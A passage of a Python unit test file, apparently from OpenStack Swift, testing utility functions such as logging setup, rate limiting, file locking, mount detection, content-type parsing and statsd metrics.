# when logging to console, stderr remains open
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
reset_loggers()
finally:
utils.sys = _orig_sys
utils.os = _orig_os
def test_get_logger_console(self):
reset_loggers()
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assert_(console_handlers)
# make sure you can't have two console handlers
self.assertEquals(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEquals(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEquals(new_handler, old_handler)
reset_loggers()
def test_ratelimit_sleep(self):
running_time = 0
start = time.time()
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.assertTrue(abs((time.time() - start) * 100) < 1)
running_time = 0
start = time.time()
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(25 - (time.time() - start) * 100) < 10)
def test_ratelimit_sleep_with_incr(self):
running_time = 0
start = time.time()
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 250 (with no -1)
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertTrue(abs(50 - (time.time() - start) * 100) < 10)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEquals(parsed.scheme, 'http')
self.assertEquals(parsed.hostname, '127.0.0.1')
self.assertEquals(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEquals(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEquals(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEquals(parsed.hostname, '::1')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEquals(parsed.hostname, '')
def test_ratelimit_sleep_with_sleep(self):
running_time = 0
start = time.time()
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(100 - (time.time() - start) * 100) < 10)
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEquals(len(asdf), 1)
self.assertEquals(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEquals(len(app_bins), 2)
self.assertEquals(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEquals(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEquals(len(sub_ini), 1)
self.assertEquals(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt'
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEquals(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assert_(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEquals(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assert_(conf_dir in conf_dirs)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEquals(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEquals(contents, 'test2')
# but can't over-write files
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEquals(os.path.exists(file_name), False)
self.assertEquals(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assert_(os.path.exists(file_name))
self.assertEquals(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEquals(utils.human_readable(0), '0')
self.assertEquals(utils.human_readable(1), '1')
self.assertEquals(utils.human_readable(10), '10')
self.assertEquals(utils.human_readable(100), '100')
self.assertEquals(utils.human_readable(999), '999')
self.assertEquals(utils.human_readable(1024), '1Ki')
self.assertEquals(utils.human_readable(1535), '1Ki')
self.assertEquals(utils.human_readable(1536), '2Ki')
self.assertEquals(utils.human_readable(1047552), '1023Ki')
self.assertEquals(utils.human_readable(1048063), '1023Ki')
self.assertEquals(utils.human_readable(1048064), '1Mi')
self.assertEquals(utils.human_readable(1048576), '1Mi')
self.assertEquals(utils.human_readable(1073741824), '1Gi')
self.assertEquals(utils.human_readable(1099511627776), '1Ti')
self.assertEquals(utils.human_readable(1125899906842624), '1Pi')
self.assertEquals(utils.human_readable(1152921504606846976), '1Ei')
self.assertEquals(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEquals(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEquals(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
for goodurl in ('http://1.1.1.1/v1/a/c/o',
'http://1.1.1.1:8080/a/c/o',
'http://2.2.2.2/a/c/o',
'https://1.1.1.1/v1/a/c/o',
''):
self.assertEquals(utils.validate_sync_to(goodurl,
['1.1.1.1', '2.2.2.2']),
None)
for badurl in ('http://1.1.1.1',
'httpq://1.1.1.1/v1/a/c/o',
'http://1.1.1.1/v1/a/c/o?query',
'http://1.1.1.1/v1/a/c/o#frag',
'http://1.1.1.1/v1/a/c/o?query#frag',
'http://1.1.1.1/v1/a/c/o?query=param',
'http://1.1.1.1/v1/a/c/o?query=param#frag',
'http://1.1.1.2/v1/a/c/o'):
self.assertNotEquals(
utils.validate_sync_to(badurl, ['1.1.1.1', '2.2.2.2']),
None)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEquals(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEquals(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_quorum_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n)) for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(1))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE = 1022
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
# succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, and even though
# file size is 0, since we're under the reserve, fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEquals(len(trans_id), 34)
self.assertEquals(trans_id[:2], 'tx')
self.assertEquals(trans_id[23], '-')
self.assertEquals(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEquals(len(trans_id), 41)
self.assertEquals(trans_id[:2], 'tx')
self.assertEquals(trans_id[34:], '-suffix')
self.assertEquals(trans_id[23], '-')
self.assertEquals(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEquals(ts, 1366428678)
self.assertEquals(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEquals(ts, 1366428678)
self.assertEquals(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEquals(ts, None)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEquals(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEquals(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEquals(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEquals(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEquals(listing_dict['bytes'], 15)
self.assertEquals(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEquals(listing_dict['bytes'], 1234)
self.assertEquals(listing_dict['content_type'],
'text/plain;hello="world"')
def test_quote(self):
res = utils.quote('/v1/a/c3/subdirx/')
assert res == '/v1/a/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/')
assert res == '/v1/a%26b/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
assert res == '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F'
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEquals('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEquals('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEquals(chunks, in_iter)
def test_next(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = iter_file.next()
except StopIteration:
break
chunks.append(chunk)
self.assertEquals(chunks, in_iter)
def test_read(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEquals(iter_file.read(), ''.join(in_iter))
def test_read_with_size(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEquals(''.join(chunks), ''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEquals(utils.FileLikeIter('abc').read(0), '')
def test_readline(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEquals(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readline2(self):
self.assertEquals(
utils.FileLikeIter(['abc', 'def\n']).readline(4),
'abcd')
def test_readline3(self):
self.assertEquals(
utils.FileLikeIter(['a' * 1111, 'bc\ndef']).readline(),
('a' * 1111) + 'bc\n')
def test_readline_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEquals(
lines,
['ab', 'c\n', 'd\n', 'ef', 'g\n', 'h\n', 'ij', '\n', '\n', 'k\n',
'tr', 'ai', 'li', 'ng', '.'])
def test_readlines(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEquals(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readlines_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEquals(
lists_of_lines,
[['ab'], ['c\n'], ['d\n'], ['ef'], ['g\n'], ['h\n'], ['ij'],
['\n', '\n'], ['k\n'], ['tr'], ['ai'], ['li'], ['ng'], ['.']])
def test_close(self):
iter_file = utils.FileLikeIter('abcdef')
self.assertEquals(iter_file.next(), 'a')
iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertEqual(None, logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assert_(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.args[0], 'METHOD.timing')
self.assert_(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(mock_controller.args[0], 'METHOD.timing')
self.assert_(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(mock_controller.args[0], 'METHOD.errors.timing')
self.assert_(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
raise ValueError("concurrent access is bad, mmmkay? (%r)")
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
